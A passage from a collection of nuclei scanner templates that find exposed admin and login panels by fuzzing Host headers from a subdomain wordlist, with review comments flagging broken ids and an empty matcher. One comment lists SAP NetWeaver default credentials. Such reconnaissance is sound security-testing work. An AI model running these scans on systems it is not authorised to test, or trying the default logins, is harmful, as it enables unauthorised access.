--------------------------------------------------------------------------------
# Reports a match when the response to GET /forum/phpmyadmin/ contains "phpMyAdmin".
# The Host header is filled from each entry of the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 7

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /forum/phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-8.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /php/phpmyadmin/ contains "phpMyAdmin".
# The Host header is filled from each entry of the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 8

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /php/phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-9.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /typo3/phpmyadmin/ contains "phpMyAdmin".
# The Host header is filled from each entry of the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 9

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /typo3/phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phppgadmin-panel.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /phppgadmin/ contains all three of
# "phpPgAdmin", "browser.php" and "intro.php". Host comes from the Subdomains payload file.
id: phppgadmin-panel

info:
  name: phpPgAdmin Panel
  author: Ganofins
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /phppgadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      - type: word
        # Requiring every word narrows the match more than the product name alone would.
        words:
          - "phpPgAdmin"
          - "browser.php"
          - "intro.php"
        condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/plesk-obsidian.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET /login_up.php returns status 200 and the response
# contains "Plesk Obsidian". The Host header is filled from the Subdomains payload file.
id: plesk-obsidian

info:
  name: Plesk Obsidian
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6951
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login_up.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Plesk Obsidian'

      - type: status
        status: [200]
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/plesk-onyx.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET /login_up.php returns status 200 and the response
# contains "Plesk Onyx". The Host header is filled from the Subdomains payload file.
id: plesk-onyx-login

info:
  name: Plesk Onyx login portal
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6501
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login_up.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Plesk Onyx'

      - type: status
        status: [200]
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/powerlogic-ion.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET / returns status 200 and the response contains
# "PowerLogic ION". The Host header is filled from the Subdomains payload file.
id: powerlogic-ion

info:
  name: PowerLogic ION Exposed
  author: dhiyaneshDK
  severity: low
  reference: https://www.exploit-db.com/ghdb/6810
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'PowerLogic ION'
      - type: status
        status: [200]
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/prometheus-exposed-panel.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /graph contains the Prometheus server
# description string. The Host header is filled from the Subdomains payload file.
id: prometheus-exposed-panel

info:
  name: Prometheus.io exposed panel
  author: organiccrap
  severity: low
  tags: panel,prometheus

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /graph HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    # Only one matcher is listed, so `and` has nothing to combine; a status matcher
    # may have been intended — confirm.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Prometheus Time Series Collection and Processing Server'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/rabbitmq-dashboard.yaml:
--------------------------------------------------------------------------------
# Reports a match when the body returned for GET / contains "RabbitMQ Management".
# The Host header is filled from each entry of the Subdomains payload file.
id: rabbitmq-dashboard

info:
  name: RabbitMQ Dashboard
  author: fyoorer
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Body word match only; no status code is checked.
      - type: word
        words:
          - "RabbitMQ Management"
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/remote-ui-login.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET /login.html returns status 200 and the response contains
# the 'System Manager ID: | ' string. Host comes from the Subdomains payload file.
id: remote-ui-login

info:
  name: Remote UI Login
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6815
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login.html HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      - type: word
        # NOTE(review): the trailing ' | ' looks like residue of markup lost from the
        # listing; as written the word must appear with that exact spacing — verify
        # against a real response.
        words:
          - 'System Manager ID: | '
      - type: status
        status: [200]
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/rocketmq-console-exposure.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET / contains "RocketMq-console-ng".
# The Host header is filled from each entry of the Subdomains payload file.
id: rocketmq-console-exposure

info:
  name: Apache RocketMQ Console Exposure
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "RocketMq-console-ng"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/rstudio-detect.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET / answers with status 302 and the response headers
# contain "RStudio". The Host header is filled from the Subdomains payload file.
id: rstudio-detect

info:
  name: RStudio panel detector
  author: philippedelteil
  severity: info
  tags: panel,rstudio

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      # Looks at headers, not the body; the match depends on the redirect response itself.
      - type: word
        words:
          - 'RStudio'
        part: header
      - type: status
        status: [302]
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/saferoads-vms-login.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /login.html contains "Saferoads VMS".
# The Host header is filled from each entry of the Subdomains payload file.
id: saferoads-vms-login

info:
  name: Saferoads VMS Login
  author: dhiyaneshDk
  severity: info
  tags: panel
  reference: https://www.exploit-db.com/ghdb/6941

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login.html HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - 'Saferoads VMS'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/samba-swat-panel.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response headers for GET / contain 'Basic realm="SWAT"',
# i.e. an HTTP Basic authentication challenge naming the SWAT realm.
# The Host header is filled from each entry of the Subdomains payload file.
id: samba-swat-panel
info:
  name: Samba SWAT panel
  author: PR3R00T
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      - type: word
        words:
          - 'Basic realm="SWAT"'
        part: header
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sap-hana-xsengine-panel.yaml:
--------------------------------------------------------------------------------
# Reports a match when the body returned for GET /sap/hana/xs/formLogin/login.html
# references the login page's sap.png image path.
# The Host header is filled from each entry of the Subdomains payload file.
id: sap-hana-xsengine-panel

info:
  name: SAP HANA XSEngine Admin Panel
  author: PR3R00T
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /sap/hana/xs/formLogin/login.html HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Body word match only; no status code is checked.
      - type: word
        words:
          - "/sap/hana/xs/formLogin/images/sap.png"
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sap-netweaver-portal.yaml:
--------------------------------------------------------------------------------
# Reports a match when the body returned for GET /irj/portal contains
# "SAP NetWeaver Portal". The template only detects the page; it sends no credentials.
# The Host header is filled from each entry of the Subdomains payload file.
id: sap-netweaver-portal

info:
  name: SAP NetWeaver Portal
  author: organiccrap
  severity: info
  tags: panel,sap

# SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
# For any instance this template finds, check that these vendor default accounts
# are locked or have had their passwords changed.

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /irj/portal HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Body word match only; no status code is checked.
      - type: word
        words:
          - "SAP NetWeaver Portal"
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/securenvoy-panel.yaml:
--------------------------------------------------------------------------------
1 | id: securenvoy-panel
2 | # Reports a SecurEnvoy admin login when the response to GET /secadmin/ satisfies both matchers below.
3 | info:
4 | name: SecurEnvoy Admin Login
5 | author: 0xrod
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt # absolute local path; the template cannot run unless this file exists
12 | attack: sniper
13 | threads: 100
14 | # Raw request: each payload entry is substituted into the Host header placeholder.
15 | raw:
16 | - |
17 | GET /secadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - '' # NOTE(review): an empty word is a substring of every body, so this matcher always passes and the 200 check below is the only filter; the page marker was presumably lost from this listing — restore it before trusting hits
25 | part: body
26 | # With the word matcher above vacuous, any Host value that returns 200 for /secadmin/ is reported as a SecurEnvoy panel.
27 | - type: status
28 | status:
29 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/selenoid-ui-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: selenoid-ui-exposure
2 |
3 | info:
4 | name: Selenoid UI Dashboard Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Selenoid UI"
24 | - "/manifest.json"
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sharecenter-login.yaml:
--------------------------------------------------------------------------------
1 | id: sharecenter-login
2 |
3 | info:
4 | name: ShareCenter Login Page
5 | author: dhiyaneshDk
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6892
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers:
22 | - type: word
23 | words:
24 | - "ShareCenter"
25 | - "Please Select Your Account"
26 | condition: and
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sitecore-login-panel.yaml:
--------------------------------------------------------------------------------
1 | id: sitecore-login-panel
2 |
3 | info:
4 | name: Sitecore Login Panel
5 | author: b4uh0lz
6 | severity: info
7 | tags: panel,sitecore
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /sitecore/admin/login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 |
26 | - type: word
27 | words:
28 | - "Sitecore Login"
29 | part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/siteomat-login.yaml:
--------------------------------------------------------------------------------
1 | id: siteomat-loader
2 |
3 | info:
4 | name: Orpak SiteOmat login portals
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6624
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login.htm HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'SiteOmat Login'
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/solarwinds-orion.yaml:
--------------------------------------------------------------------------------
1 | id: solarwinds-orion
2 |
3 | info:
4 | name: SolarWinds Orion Panel
5 | author: puzzlepeaches
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /Orion/Login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "SolarWinds Orion"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/solarwinds-servuftp-detect.yaml:
--------------------------------------------------------------------------------
1 | id: solarwinds-servuftp-detect
2 |
3 | info:
4 | name: SolarWinds Serv-U FileServer
5 | author: johnk3r
6 | severity: info
7 | tags: solarwinds,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 |
23 | - type: regex
24 | part: header
25 | regex:
26 | - "Serv-U"
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/solr-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: solr-exposure
2 |
3 | info:
4 | name: Apache Solr Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /solr/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Solr Admin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/somfy-login.yaml:
--------------------------------------------------------------------------------
1 | id: somfy-login
2 |
3 | info:
4 | name: Somfy Login Page
5 | author: DhiyaneshDK
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /m_login.htm HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "Home motion by Somfy"
25 |
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sonarqube-login.yaml:
--------------------------------------------------------------------------------
1 | id: sonarqube-login
2 |
3 | info:
4 | name: SonarQube panel detect
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /sessions/new HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "SonarQube"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sonicwall-management-panel.yaml:
--------------------------------------------------------------------------------
1 | id: sonicwall-management-panel
2 |
3 | info:
4 | name: SonicWall Management Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /auth.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "SonicWall - Authentication"
24 | - "SonicWall Administrator"
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sonicwall-sslvpn-panel.yaml:
--------------------------------------------------------------------------------
1 | id: sonicwall-sslvpn-panel
2 |
3 | info:
4 | name: SonicWall Virtual Office SSLVPN Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /cgi-bin/welcome HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Virtual Office"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/strapi-admin-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: strapi-admin-exposure
2 |
3 | info:
4 | name: Strapi Admin Dasboard Exposure
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/auth/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "Strapi Admin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/strapi-panel.yaml:
--------------------------------------------------------------------------------
1 | id: strapi-panel
2 |
3 | info:
4 | name: Strapi Login Panel
5 | author: idealphase
6 | severity: info
7 | tags: panel,strapi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/auth/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 |
25 | - type: word
26 | words:
27 | - "Strapi Admin"
28 |
29 | - type: status
30 | status:
31 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/supervpn-panel.yaml:
--------------------------------------------------------------------------------
1 | id: supervpn-detect
2 |
3 | info:
4 | name: SuperVPN panel detect
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/login.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Sign In-SuperVPN"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/synnefo-admin-panel.yaml:
--------------------------------------------------------------------------------
1 | id: synnefo-admin-panel
2 |
3 | info:
4 | name: Synnefo Admin Panel Exposure
5 | author: impramodsargar
6 | severity: info
7 | tags: panel,synnefo
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /synnefoclient/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Synnefo Admin'
25 |
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/tikiwiki-cms-1.yaml:
--------------------------------------------------------------------------------
1 | id: tikiwiki-cms 1
2 |
3 | info:
4 | name: Tiki Wiki CMS Groupware
5 | author: chron0x
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /tiki-login_scr.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 | - type: word
26 | words:
27 | - "Tiki Wiki CMS Groupware"
28 | part: body
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/tikiwiki-cms-2.yaml:
--------------------------------------------------------------------------------
1 | id: tikiwiki-cms 2
2 |
3 | info:
4 | name: Tiki Wiki CMS Groupware
5 | author: chron0x
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /tiki-login.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 | - type: word
26 | words:
27 | - "Tiki Wiki CMS Groupware"
28 | part: body
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/total-web.yaml:
--------------------------------------------------------------------------------
1 | id: total-web-login
2 |
3 | info:
4 | name: Total Web Solution
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6811
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'Total Web Solutions'
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/traefik-dashboard.yaml:
--------------------------------------------------------------------------------
1 | id: traefik-dashboard-detect
